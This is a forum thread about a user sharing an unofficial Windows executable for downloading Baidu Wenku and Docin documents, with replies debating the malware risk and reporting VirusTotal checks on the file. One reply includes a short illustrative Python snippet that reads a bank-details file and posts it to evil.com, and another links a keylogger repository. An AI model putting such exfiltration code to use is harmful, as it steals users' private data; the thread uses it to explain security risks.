Jump to content
Chinese-forums.com
Learn Chinese in China

Tool for dowloading baidu weku, docin etc.


Recommended Posts

markhavemann

Download documents from Baidu Wenku 百度文库, Docin.com 豆丁网 and similar sites. 

 

冰点下载器 - fish.exe

- preserves formatting, including tables

- exports to PDF and TXT

- works on all the sites and documents I've tried so far (not that many) 

 

Homepage (probably): http://www.bingdian001.com/  - might need a VPN?

Also available from other questionable sites around the Chinese internet so be cautious. 

 

I've also included the version (June 2020) that I downloaded (but can't remember from where) which I've used for two months+ and seems to be free of malware.

 

idocdown_3.2.12.rar

 

Some screenshots

 

clipImage_13082020080724.thumb.png.e15f39adb62d107f42d7581a63ecb76a.png

 

 

clipImage_13082020082712.thumb.png.bcaa6992450b8e5e338d9e1b8b40d771.pngclipImage_13082020082633.thumb.png.0f27f5689b691efcd8e7505e78c7490c.png

  • Like 1
  • Helpful 1
Link to post
Share on other sites
Site Sponsors:
Pleco for iPhone / Android iPhone & Android Chinese dictionary: camera & hand- writing input, flashcards, audio.
Study Chinese in Kunming 1-1 classes, qualified teachers and unique teaching methods in the Spring City.
Learn Chinese Characters Learn 2289 Chinese Characters in 90 Days with a Unique Flash Card System.
Hacking Chinese Tips and strategies for how to learn Chinese more efficiently
Popup Chinese Translator Understand Chinese inside any Windows application, website or PDF.
Chinese Grammar Wiki All Chinese grammar, organised by level, all in one place.

Demonic_Duck

Can you give an example of a page with text you can't download/copy? There are other ways of doing this in the browser that don't require running unknown .exe files.

Link to post
Share on other sites

We've waived red flags here before about people posting .exe files for download. Same poster in fact.

 

And let's add a reminder that virus checkers are hardly foolproof.

 

 

Link to post
Share on other sites
大块头

I'd be nervous about unverified programs like this installing a keylogger to steal passwords and credit card numbers... The best-case scenario is that it installs adware and bogs down your machine.

 

I'll assume that Mark is using this software on a virtual machine or a computer he doesn't care about. :wink:

Link to post
Share on other sites
markhavemann
5 hours ago, 大块头 said:

I'll assume that Mark is using this software on a virtual machine or a computer he doesn't care about.

Hardly. Windows 10 has almost daily security updates and the built in anti virus seems to be extremely thorough.

 

Not to mention Chrome scans every file and flags anything suspicious before windows even has a chance.

 

I'm pretty confident that anything that gets passed both Chrome and the Windows built in anti virus (how hasn't this put Norton out of business already?) is safe.  

 

10 hours ago, 889 said:

And let's add a reminder that virus checkers are hardly foolproof.

Really? How often have you gotten viruses from files that you download but are missed by both Windows 10 anti virus and Chrome? Plus whatever else you choose to scan it with.

 

I'm (obviously) quite liberal with what I'll run on my computer and it's been a very very very long time since I got any anything even slightly malicious. 

 

 

10 hours ago, 889 said:

We've waived red flags here before about people posting .exe files for download. Same poster in fact.

Ever wanted to download something only to find that all the links are broken? It's pretty annoying, so I posted my copy. 

 

This is the internet, it's important to be cautious. If you don't feel comfortable with something, don't download it, but that doesn't mean that I shouldn't post exe's just because some people don't believe in or trust anti virus software.

 

10 hours ago, Demonic_Duck said:

Can you give an example of a page with text you can't download/copy? There are other ways of doing this in the browser that don't require running unknown .exe files.

Sure, I'll add some screenshots to the post. There are other ways like disabling their functions that block copying and stuff, but it's really annoying and the formatting often gets messed up. This even preserves tables which is nice.

Link to post
Share on other sites
philwhite
14 hours ago, markhavemann said:

I'll add some screenshots to the post

Rather then screenshots, could you please post the links in plain text to the forum ... or the link to the search pages and the search term? That would be easier for us to follow and understand the difficulty you describe.

 

  • Like 1
Link to post
Share on other sites
markhavemann
11 minutes ago, philwhite said:

Rather then screenshots, could you please post the links in plain text to the forum ... or the link to the search pages and the search term? That would be easier for us to follow and understand the difficulty you describe.

I just realised that I misunderstood Demonic_Duck's post. I've still added some screenshots anyway. 

 

I'm not having any difficulties.

 

To be clear: 

I found this a few months ago and it downloads into PDF and TXT in a few seconds. It works on a bunch of sites. It's convenient and I wanted to share it. I didn't make it myself nor do I have any ties to anybody who did. 

 

**If you don't trust your anti virus software, don't download.

**If you are unsure about this application, 百度一下 and check that it has a legitimate user base and hasn't been flagged as containing malware or adware.

**If you don't trust files that I post, go and download it from somewhere else (seems like the guy who makes it has a little website http://www.bingdian001.com/

Link to post
Share on other sites

There are very very good reasons why responsible people do not do not post .exe files. They post links to the developer's site or to a trusted third-party site like Tucows. And responsible people know why this is the practice. They don't become defensive when the risks are pointed out.

 

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

Link to post
Share on other sites
Demonic_Duck
30 minutes ago, markhavemann said:

I just realised that I misunderstood Demonic_Duck's post. I've still added some screenshots anyway.

 

You still haven't posted any links. But upon browsing some files I can see how copying is an issue. Looks like they've gone to great lengths to mangle the formatting when it's pasted into other programs.

 

23 minutes ago, 889 said:

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

 

Bit harsh. Plenty of otherwise intelligent folks aren't especially savvy about computer security. But yeah, I'd much rather pay the 8.88 CNY to buy the document rather than take the risk...

  • Like 2
Link to post
Share on other sites
philwhite
1 hour ago, Demonic_Duck said:

upon browsing some files I can see how copying is an issue. Looks like they've gone to great lengths to mangle the formatting when it's pasted into other programs.

Yes, looking at this page https://wenku.baidu.com/view/d4d2e1e3122de2bd960590c69ec3d5bbfd0adaa6 I reached the same conclusion. It looks like to Baidu have scanned various documents from other sources and then, rather than post as pdf, they post this html with precise positioning of each sentence, or often for each individual character in a table. For example this html fragment:

  • p class="reader-word-layer reader-word-s3-0" style="width:761px;height:190px;line-height:190px;top:1974px;left:1429px;z-index:145;false">语文园地/p

This is all wrapped in a div class="reader-container" and a div class="reader-page with some javascript to render the text. If you try to scroll down, you can click to see more and then have to pay to view the rest of the document of download to another format. There is a copyright notice at the end of the html

  • div 京ICP证030173号  京网文[2013]0934-983号  Copyright  ©span id="copyright-date"2020/span Baidu<div class="line"|/div>由 百度云 提供计算服务/div

It looks like Baidu are attempting to monetize someone's document content.

Link to post
Share on other sites
大块头
Quote

版权说明:本文档由用户提供并上传,若内容存在侵权,请进行举报或认领

 

Or incentivizing people to post things they don't necessarily own. Reminds me of Scribd.

  • Like 1
Link to post
Share on other sites
philwhite

 

4 hours ago, markhavemann said:

seems like the guy who makes it has a little website http://www.bingdian001.com/

That site didn't work for me but his site seems to list it https://www.gycc.com/n/15906.html

 

Also this site has a similar file fish.exe with MD5 listed and that matches when I downloaded and checked. However the file posted by OP has a Fish.exe which claims to be the same product version (3.2.0.0) and the same file version (3.2.3.0) but the OP's Fish.exe is slightly larger and has a different MD5, of course.

 

No hits on malware checks so far, but it would be cool if we were the first to spot some new malware. No time to play with VMs today. Virustotal report on the OP's Fish.exe looks fine  - it looks like it might export pdfs and pngs, as you'd expect.

 

Taking a look at the other files in the OP's .rar, I checked ssleay32.dll and libeay32.dll because, although they are needed for https, they could be used for C&C. For both dlls, they check out fine on Virustotal but, on the Relations tab under Execution parent, I noticed Fish.exe scanned 9 August 2020. That was a different, malicious version of Fish.exe on virustotal's report

 

So, there are other malicious versions of Fish.exe circulating with exactly the same File Version Information (Copyright, Product, Decription, File Version) as the Fish.exe which OP posted.

 

  • Helpful 2
Link to post
Share on other sites
markhavemann
6 hours ago, philwhite said:

It looks like Baidu are attempting to monetize someone's document content.

I really hate seeing websites do this. It seems to be quite common in China. The number of websites charging for pirated content or content that they don't own themselves is way too high. 

 

5 hours ago, philwhite said:

Virustotal report on the OP's Fish.exe looks fine  - it looks like it might export pdfs and pngs, as you'd expect.

Thanks for not completely panicking, and doing an actual virus check instead of freaking out as soon as you see "rar" or "exe" 

 

5 hours ago, philwhite said:

So, there are other malicious versions of Fish.exe circulating with exactly the same File Version Information (Copyright, Product, Decription, File Version) as the Fish.exe which OP posted.

I'm always cautious downloading stuff from the Chinese internet, hence my posting what seems to be a clean version. It's at least two months old and if it hasn't been flagged by some or other anti virus I think there is really no reason to think it's malicious.

 

At any rate, my bank account hasn't been emptied yet, nor has my computer imploded, exploded, or any other form of -ploded from using this, so I'll keep using it and I'll keep the post up unless the admins have a problem with it. 

 

Link to post
Share on other sites
markhavemann
9 hours ago, 889 said:

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

I didn't see you freaking out about the python script posted a few days ago.

 

I'm not a Python expert but I know that python can register hotkeys and grab keypresses, it can also send and receive data over the internet. I don't think those libraries or a script using them would even be flagged by chrome or anti virus software.

 

OP even tells you how to install Python and run his script without any knowledge of python code, so anybody could easily run it without having any idea what it's doing. Yes it's on gitub, but here is a link to an actual Python keylogger on github (https://github.com/secureyourself7/python-keylogger) so that doesn't really make it trustworthy, does it?

 

I think being a little extreme in your caution is better than being the kind of person who just downloads and runs anything from the internet, but maybe it's better to do a little research and inform ourselves rather than making wild statements without any proof to back them up.

Edit

You'd better expand your crusade to posts containing Microsoft Word and Excel documents too, as they can contain macro viruses. One of the most famous viruses, Melissa, was spread via Word documents.

 

Or do you trust the part of anti virus software that scans documents, but not the part that scans exe's?...

 

https://thehackernews.com/2016/02/locky-ransomware-decrypt.html

  • Like 1
Link to post
Share on other sites
Demonic_Duck
6 hours ago, markhavemann said:

I didn't see you freaking out about the python script posted a few days ago.

 

Python source code typically looks something like this:

...
with open('bank_details.txt') as f:
  data = f.read()
  requests.post(url = 'https://www.evil.com', data = data)

...

 

It might be intentionally obfuscated by its author to help hide its true purpose, but it would then at least be visible that it had been obfuscated and hence couldn't be trusted.

 

Meanwhile, an .exe file would look more like this, if you tried to open it in a text editor:

 

...x��U�n1}_i�aM$�/c{-E�6�%�H��>�> ��V��4U�~}�k��B�HA���Ό�̑g;�����t� ��t# �y�#�.�g���`P��>�>��2ς%��u�w�ȳ��b:�7�}��y=J�[8=�\W�]ggpޭ �SGJᔧ<�眏)...

 

With some technical expertise and specialized tools, you can reverse engineer it to get something similar to the source code (but not exactly the same). Such reverse engineered code is always heavily obfuscated - not intentionally, but because compiling code is a lossy process. You therefore have no way of knowing if it's likely to be malicious without combing carefully through it, which is no easy task, even for experts.

 

Antivirus software can short-circuit all of this by checking file hashes against lists of already known malicious software and perhaps by some other clever methods, but this is never going to be a foolproof method of detection for new and unknown viruses.

  • Like 2
Link to post
Share on other sites
philwhite
7 hours ago, markhavemann said:

At any rate, my bank account hasn't been emptied yet,

"Give us another week or two, we are still encrpyting your hard drive (and decrypting files on the fly on access). We are only doing it slowly so that you won't notice. Then we'll send you the ransomware note next month when we are done encrpypting most of your files" 🤑

 

12 minutes ago, Demonic_Duck said:

but this is never going to be a foolproof method of detection for new and unknown viruses.

Exactly. Though inserting attacks which aren't novel into popular, frequently downloaded software is more common.

  • Like 1
Link to post
Share on other sites
Demonic_Duck
6 hours ago, markhavemann said:

You'd better expand your crusade to posts containing Microsoft Word and Excel documents too, as they can contain macro viruses. One of the most famous viruses, Melissa, was spread via Word documents.

 

All modern versions of Word disable automatic macro execution unless you allow it on a file-by-file basis or intentionally re-enable it globally.

 

Also, Word macros are written in VBA. Like Python, VBA is an interpreted language, meaning you can easily examine its source code. (Unlike Python, VBA is a horrible steaming pile of 💩, but that's another story...)

  • Like 1
Link to post
Share on other sites

"Plenty of otherwise intelligent folks aren't especially savvy about computer security."

 

Maybe 10 or 15 years ago this was true. But by now, just about everyone knows you shouldn't click on an .exe file you get in an email, even if the email seems to come from a trusted friend. This is no different.

 

And if a file called fish.exe doesn't raise your suspicions . . .

Link to post
Share on other sites

From our point of view (well, mine, at least)

1) I do get slightly nervous about people posting .exe files, but there are legitimate cases - various people have used the forum to host software they've written. We'd be particularly sceptical about a new poster doing it. But it's not like our saying no would make much odds, you could just put it on a file-sharing site and the exact same people will download it, and as has been amply pointed out, the risks aren't what they once were.

2) What we don't like is hosting  without good reason resources other people have produced and still provide. That gets into issues of copyright and good manners. As far as I can tell the original site for this isn't working, but it'd be appreciated if the first post could be edited with a link and whatever info is available. Credit where it's due and all that. If there's a reliable official download site, a link to that is preferred, rather than us hosting someone else's possibly out-of-date work.

3) This was a lot more discussion than needed. 

  • Like 1
Link to post
Share on other sites
  • 7 months later...
markhavemann

My version doesn't of this doesn't seem to download from Baidu anymore, they must have updated the way they do things. 

 

Sadly it seems like the devloper has taken this down from his own page too. Quite a pity. Here's the message he put up, if anyone is interested: 

 

"由于各种压力等原因,停止冰点软件维护和下载。"

Link to post
Share on other sites

Join the conversation

You can post now and select your username and password later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Click here to reply. Select text to quote.

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...